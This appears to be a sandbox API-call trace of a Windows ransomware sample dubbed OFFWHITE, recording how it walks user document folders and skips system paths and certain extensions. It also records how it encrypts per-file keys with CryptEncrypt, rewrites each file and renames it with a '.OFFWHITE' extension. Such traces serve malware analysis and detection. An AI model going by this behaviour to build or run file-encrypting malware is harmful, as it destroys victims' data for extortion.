lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.847] GetProcessHeap () returned 0x500000 [0132.847] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f5f8 [0132.847] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aebzmg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.848] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=79390) returned 1 [0132.848] GetProcessHeap () returned 0x500000 [0132.848] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.848] GetProcessHeap () returned 0x500000 [0132.848] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.848] GetProcessHeap () returned 0x500000 [0132.848] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.848] GetProcessHeap () returned 0x500000 [0132.848] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.848] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.848] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.848] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.848] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.848] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.848] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.848] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.848] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.848] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.848] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.849] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.849] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.849] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1361e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.849] SetLastError (dwErrCode=0x0) [0132.849] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.851] GetLastError () returned 0x0 [0132.851] GetLastError () returned 0x0 [0132.851] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1371e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.851] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.851] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1381e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.851] WriteFile (in: hFile=0xb0, lpBuffer=0x53f5f8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f5f8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.851] GetProcessHeap () returned 0x500000 [0132.851] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1361e) returned 0x55a7b8 [0132.851] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.851] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1361e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x1361e, lpOverlapped=0x0) returned 1 [0132.857] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.857] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1361e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x1361e, lpOverlapped=0x0) returned 1 [0132.858] GetProcessHeap () returned 0x500000 [0132.858] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.858] CloseHandle (hObject=0xb0) returned 1 [0132.870] GetProcessHeap () returned 0x500000 [0132.870] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.870] GetProcessHeap () returned 0x500000 [0132.870] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.870] GetProcessHeap () returned 0x500000 [0132.870] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.870] GetProcessHeap () returned 0x500000 [0132.870] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.870] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx" [0132.870] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx.OFFWHITE" [0132.870] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aebzmg.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aebzmg.xlsx.offwhite")) returned 1 [0132.871] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb5f4680, ftCreationTime.dwHighDateTime=0x1d5696b, ftLastAccessTime.dwLowDateTime=0x5e893d00, ftLastAccessTime.dwHighDateTime=0x1d56837, ftLastWriteTime.dwLowDateTime=0x5e893d00, ftLastWriteTime.dwHighDateTime=0x1d56837, nFileSizeHigh=0x0, nFileSizeLow=0x28ac, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="afoAtlv7qwBY7ACNkxWw.docx", cAlternateFileName="AFOATL~1.DOC")) returned 1 [0132.871] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2=".") returned 1 [0132.871] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="..") returned 1 [0132.871] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="...") returned 1 [0132.871] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="windows") returned -1 [0132.871] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="$recycle.bin") returned 1 [0132.871] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="rsa") returned -1 [0132.871] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="ntuser.dat") returned -1 [0132.872] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="programdata") returned -1 [0132.872] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="appdata") returned -1 [0132.872] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="program files") returned -1 [0132.872] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="program files (x86)") returned -1 [0132.872] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.872] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="afoAtlv7qwBY7ACNkxWw.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx" [0132.872] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.872] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.872] PathFindExtensionW (pszPath="afoAtlv7qwBY7ACNkxWw.docx") returned=".docx" [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0132.872] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0132.872] lstrcmpiW (lpString1="afoAtlv7qwBY7ACNkxWw.docx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.872] GetProcessHeap () returned 0x500000 [0132.873] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f608 [0132.875] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afoatlv7qwby7acnkxww.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.875] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=10412) returned 1 [0132.875] GetProcessHeap () returned 0x500000 [0132.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.876] GetProcessHeap () returned 0x500000 [0132.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.876] GetProcessHeap () returned 0x500000 [0132.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.876] GetProcessHeap () returned 0x500000 [0132.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.876] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.876] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.876] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.876] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.876] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.876] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.876] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.876] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.876] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.876] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.876] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.877] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.877] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x28ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.877] SetLastError (dwErrCode=0x0) [0132.877] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.880] GetLastError () returned 0x0 [0132.880] GetLastError () returned 0x0 [0132.880] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x29ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.880] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.880] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2aac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.880] WriteFile (in: hFile=0xb0, lpBuffer=0x53f608*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f608*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.880] GetProcessHeap () returned 0x500000 [0132.880] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x28ac) returned 0x55a7b8 [0132.880] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.880] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x28ac, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x28ac, lpOverlapped=0x0) returned 1 [0132.882] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.882] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x28ac, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x28ac, lpOverlapped=0x0) returned 1 [0132.882] GetProcessHeap () returned 0x500000 [0132.882] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.882] CloseHandle (hObject=0xb0) returned 1 [0132.883] GetProcessHeap () returned 0x500000 [0132.883] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.883] GetProcessHeap () returned 0x500000 [0132.883] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.883] GetProcessHeap () returned 0x500000 [0132.883] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.883] GetProcessHeap () returned 0x500000 [0132.883] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.883] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx" [0132.884] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx.OFFWHITE" [0132.884] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afoatlv7qwby7acnkxww.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\afoAtlv7qwBY7ACNkxWw.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afoatlv7qwby7acnkxww.docx.offwhite")) returned 1 [0132.885] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f10c660, ftCreationTime.dwHighDateTime=0x1d5e140, ftLastAccessTime.dwLowDateTime=0x4a8ab2a0, ftLastAccessTime.dwHighDateTime=0x1d5e719, ftLastWriteTime.dwLowDateTime=0x4a8ab2a0, ftLastWriteTime.dwHighDateTime=0x1d5e719, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="Bk4kizkgWa", cAlternateFileName="BK4KIZ~1")) returned 1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2=".") returned 1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="..") returned 1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="...") returned 1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="windows") returned -1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="$recycle.bin") returned 1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="rsa") returned -1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="ntuser.dat") returned -1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="programdata") returned -1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="appdata") returned 1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="program files") returned -1 [0132.885] lstrcmpiW (lpString1="Bk4kizkgWa", lpString2="program files (x86)") returned -1 [0132.885] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.885] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Bk4kizkgWa" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa" [0132.885] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" [0132.885] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" [0132.885] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\*.*" [0132.885] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f10c660, ftCreationTime.dwHighDateTime=0x1d5e140, ftLastAccessTime.dwLowDateTime=0x4a8ab2a0, ftLastAccessTime.dwHighDateTime=0x1d5e719, ftLastWriteTime.dwLowDateTime=0x4a8ab2a0, ftLastWriteTime.dwHighDateTime=0x1d5e719, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName=".", cAlternateFileName="")) returned 0x544650 [0132.888] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.888] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f10c660, ftCreationTime.dwHighDateTime=0x1d5e140, ftLastAccessTime.dwLowDateTime=0x4a8ab2a0, ftLastAccessTime.dwHighDateTime=0x1d5e719, ftLastWriteTime.dwLowDateTime=0x4a8ab2a0, ftLastWriteTime.dwHighDateTime=0x1d5e719, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="..", cAlternateFileName="")) returned 1 [0132.888] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.888] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.888] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5131bd0, ftCreationTime.dwHighDateTime=0x1d5dead, ftLastAccessTime.dwLowDateTime=0x23faf5e0, ftLastAccessTime.dwHighDateTime=0x1d5dcf7, ftLastWriteTime.dwLowDateTime=0x23faf5e0, ftLastWriteTime.dwHighDateTime=0x1d5dcf7, nFileSizeHigh=0x0, nFileSizeLow=0x95b0, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="BruxE7OiJn6.pdf", cAlternateFileName="BRUXE7~1.PDF")) returned 1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2=".") returned 1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="..") returned 1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="...") returned 1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="windows") returned -1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="$recycle.bin") returned 1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="rsa") returned -1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="ntuser.dat") returned -1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="programdata") returned -1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="appdata") returned 1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="program files") returned -1 [0132.888] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="program files (x86)") returned -1 [0132.888] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" [0132.888] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\", lpString2="BruxE7OiJn6.pdf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf" [0132.888] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.888] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.888] PathFindExtensionW (pszPath="BruxE7OiJn6.pdf") returned=".pdf" [0132.888] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0132.888] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0132.888] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".com") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".cpl") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".url") returned -1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".mp3") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".pif") returned -1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".mp4") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".OFFWHITE") returned 1 [0132.889] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0132.889] lstrcmpiW (lpString1="BruxE7OiJn6.pdf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.889] GetProcessHeap () returned 0x500000 [0132.889] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f618 [0132.889] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\BruxE7OiJn6.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\bruxe7oijn6.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.889] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=38320) returned 1 [0132.889] GetProcessHeap () returned 0x500000 [0132.889] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.889] GetProcessHeap () returned 0x500000 